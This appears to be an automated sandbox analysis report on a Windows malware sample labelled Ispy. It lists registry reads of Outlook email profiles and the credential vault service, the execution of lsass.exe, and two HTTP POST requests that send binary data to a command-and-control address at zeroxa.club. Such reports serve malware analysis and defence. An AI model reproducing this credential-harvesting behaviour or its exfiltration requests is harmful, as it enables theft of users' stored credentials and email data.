HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe

Read Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
D448845E628773E4A9A809DA

Resolved APIs


Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\documents.exe"
C:\Windows\system32\lsass.exe

Started Services

VaultSvc

Created Services

Nothing to display

Behavior analysis details

Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-08-31 05:29:55 2018-08-31 05:32:55 180

2 HTTP Request(s) detected

http://zeroxa.club/mem/fre.php
  • Hostname: zeroxa.club
  • IP Address:
  • Port: 80
  • Count: 2

POST /mem/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: zeroxa.club
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: BF8961C8
Content-Length: 192
Connection: close

http://zeroxa.club/mem/fre.php
  • Hostname: zeroxa.club
  • IP Address:
  • Port: 80
  • Count: 3

POST /mem/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: zeroxa.club
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: BF8961C8
Content-Length: 165
Connection: close

Detected family: #Ispy

TheSystem Itself @ 2018-08-31 05:46:04